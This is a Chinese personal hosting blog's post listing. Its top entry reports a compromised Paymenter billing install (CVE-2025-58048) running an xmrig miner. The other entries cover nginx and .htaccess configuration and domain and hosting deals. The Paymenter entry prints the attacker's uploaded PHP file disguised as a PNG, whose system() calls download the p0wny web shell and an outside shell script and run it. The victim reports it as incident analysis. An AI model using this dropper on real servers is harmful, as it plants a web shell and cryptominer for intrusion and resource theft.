paymenter财务主机计费系统有上传漏洞

2025-10-10 Linux,虚拟主机 YY.K Permalink

上半年装了一个体验一下丢着一直没管,今天上去发现有挖矿进程。

 

漏洞具体细节:https://cve.imfht.com/detail/CVE-2025-58048

 

root@localhost:/tmp# lsof -p 1479735 
COMMAND     PID      USER   FD      TYPE             DEVICE SIZE/OFF     NODE NAME
xmrig   1479735 paymenter  cwd       DIR              254,3      117 15784149 /home/paymenter/storage/app/public/ticket-attachments
xmrig   1479735 paymenter  rtd       DIR              254,3      298      128 /
xmrig   1479735 paymenter  txt       REG              254,3  8334576 15784153 /home/paymenter/storage/app/public/ticket-attachments/xmrig
xmrig   1479735 paymenter  mem       REG              254,3      561  3231722 /usr/share/zoneinfo/Asia/Shanghai
xmrig   1479735 paymenter  mem       REG               0,14          70684614 anon_inode:[io_uring] (stat: No such file or directory)
xmrig   1479735 paymenter    0r      CHR                1,3      0t0        4 /dev/null
xmrig   1479735 paymenter    1w     FIFO               0,13      0t0 70686037 pipe
xmrig   1479735 paymenter    2w     FIFO               0,13      0t0 70685837 pipe
xmrig   1479735 paymenter    3u  a_inode               0,14        0     1048 [eventpoll:9,11,13,14,15]
xmrig   1479735 paymenter    4u     unix 0x00000000bd7e1641      0t0    26784 type=STREAM (CONNECTED)
xmrig   1479735 paymenter    5u  a_inode               0,14        0 70684614 [io_uring]
xmrig   1479735 paymenter    6r      REG              254,3      215 15784150 /home/paymenter/storage/app/public/ticket-attachments/XBrs38qG8DslCb8cOGWntcvNOceYQsu2AvFiQYDw.php
xmrig   1479735 paymenter    7r     FIFO               0,13      0t0 70684615 pipe
xmrig   1479735 paymenter    8w     FIFO               0,13      0t0 70684615 pipe
xmrig   1479735 paymenter    9r     FIFO               0,13      0t0 70684616 pipe
xmrig   1479735 paymenter   10w     FIFO               0,13      0t0 70684616 pipe
xmrig   1479735 paymenter   11u  a_inode               0,14        0     1048 [eventfd:17]
xmrig   1479735 paymenter   12r      CHR                1,3      0t0        4 /dev/null
xmrig   1479735 paymenter   13u  a_inode               0,14        0     1048 [eventfd:25]
xmrig   1479735 paymenter   14u  a_inode               0,14        0     1048 [eventfd:27]
xmrig   1479735 paymenter   15u     IPv4          102158557      0t0      TCP XXXXXXX:53580->252.104.20.157.sg.kuroit.com:https (ESTABLISHED)
root@localhost:/tmp# cat /home/paymenter/storage/app/public/ticket-attachments/XBrs38qG8DslCb8cOGWntcvNOceYQsu2AvFiQYDw.php
@PNG
<?php 
system("wget https://raw.githubusercontent.com/flozz/p0wny-shell/refs/heads/master/shell.php");
system("wget https://bestvip.pt/storage/ticket-attachments/script.sh");
system("bash script.sh")
 ?>

阅读剩余部分...

paymenter, 财务系统

nginx php.conf配置

2020-09-14 虚拟主机,其他 YY.K Permalink 
location ~ .*\.(php)?$ {
        try_files $uri = 404;
        fastcgi_split_path_info ^(.+\.php)(/.+)$;
        fastcgi_pass  unix:/dev/shm/php-cgi.sock;
        fastcgi_index index.php;
        fastcgi_param SCRIPT_FILENAME $document_root/$fastcgi_script_name;
        include fastcgi_params;
        }
location ~ .*\.(htm|gif|jpg|jpeg|png|bmp|ico|flv|swf|txt|wma)$ { expires  30d;}
location ~ .*\.(js|css)?$ { expires   1d;}
location ~ .*\.(tpl|svn|asp|aspx|jsp|do|mdb|zip|rar|bak|htc)?${ deny all; }
location ~ /0.* { deny all; }
if (!-e $request_filename) { return 444; }


nginx

不依不饶的垃圾邮件党

2015-10-20 虚拟主机 YY.K Permalink

两年前就有人一直冒充域进行发送垃圾邮件,原文地址在http://www.kvm.la/Google-APPS-SPF-DKIM.html

今天查看垃圾邮件看到退件,发件人的IP是深圳。

阅读剩余部分...

none

MAC OS X连接3389端口远程桌面客户端中文版

2013-05-25 虚拟主机 YY.K Permalink

上个月手淫同学给推荐安装office后可以顺带安装上远程桌面当时没当一回事丢脑后了,这几天遇上些问题不得不上服务器操作下就灰常土鳖的跑去下载了office才发现下了个更新包,

不经意搜索到原来微软有出OS X的远程桌面客户端,搜索到的是英文版顺藤摸瓜找到了中文版下载地址。

安装界面之许可协议

  rdcinstall.png

 

阅读剩余部分...

none

Godaddy十一月com注册首年5刀优惠码

2012-11-06 虚拟主机 YY.K Permalink
     Godaddy已经被强大的国人搞残了,一刀两刀的日子不复存在,大家就不要想着如何卡油占便宜了.

注册链接:http://www.godaddy.com/?isc=WORLDWIN

只能注册一个com享有49%的优惠,但是测试验证转入一个net域名也能同时获得49%的优惠.

优惠码到期时间为 美国时间 11月30号.

godaddy5.png
none

.htaccess中的apache rewrite规则详解

2011-12-26 虚拟主机 YY.K Permalink
.htaccess中的apache rewrite写法:

RewriteEngine On
RewriteCond %{HTTP_HOST} ^(www\.)?xxx\.com$
RewriteCond %{REQUEST_URI} !^/blog/
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ /blog/$1
# 没有输入文件名的默认到到首页
RewriteCond %{HTTP_HOST} ^(www\.)?xxx\.com$
RewriteRule ^(/)?$ blog/index.php [L]

阅读剩余部分...

none

hostable免费3年不限空间流量虚拟主机

2011-03-30 虚拟主机 YY.K Permalink
 KVM.LA购买的主机服务器配置为  因特尔至强4核 X3430 内存8G 硬盘估计是500GB的!   php配置了ionCube 解密组件,这个意味着可以安装whmcs hostbill之类的程序!(希望大伙别往上面上传安装破解版的软件!) 地址:http://www.hosttable.com 数据中心:凤凰城 使用期限:3years 主机面板:cPanel 11 无限空间大小,无限域名绑定 演示地址:http://hostable.kvm.la/ 演示站点分配在11号主机上面,hostloc上有的同学有分到8/12/14不等编号的主机! 线路走势是到达中国电信美国节点后走above.net从加州圣何塞转洛杉矶然后到达凤凰城! hosttable.com的域名是在2002年注册的,在05年不知道什么原因又关闭了!从域名whois 主机IP以及Paypal收款来判断这家公司应该是brinkster.com的小弟! 至于brinkster.com也是一家比较老的主机公司了,曾在02年搞过免费空间! 注意: 1.空间开通需要象征性的缴纳99美分手续费! 2.可以使用Paypal购买,可以够买多个具体上限数量不明! 3.空间是共享IP,独立IP价格为12美元一年。(由于国人过于强大请做好购买独立IP的准备)

1277333568.png
none

la域名最低价格仅需19.99美元

2011-03-21 虚拟主机 YY.K Permalink
没错la域名最低价格仅需19.99美元,前提是一次性注册25年! 不过感觉19.99只是一个嚎头,我在他们的网页上找了半天也只找到了10年的选项! 前晚注册了KVM.LA花了24.99美元 ,顺带简单的介绍下 注册地址:http://www.domainmonster.com/ 一次性注册25年为19.99$/y 一次性注册10年为22.99/$y 带免费域名隐私保护! 单年注册价格是24.99$其实这个价格已经是目前见过最低的! 我注册付款的时候直接用Visa飘过,好像没见到有Paypal选项! 有Master Card和Visa的话还是蛮方便的! PS:这家的whois刷新比较慢 大约是2个小时刷新一次,所以更新dns和资料的需要等一段时间才能生效! 关于domainmonster大家自己Google下吧,是家英国的老牌注册商!
none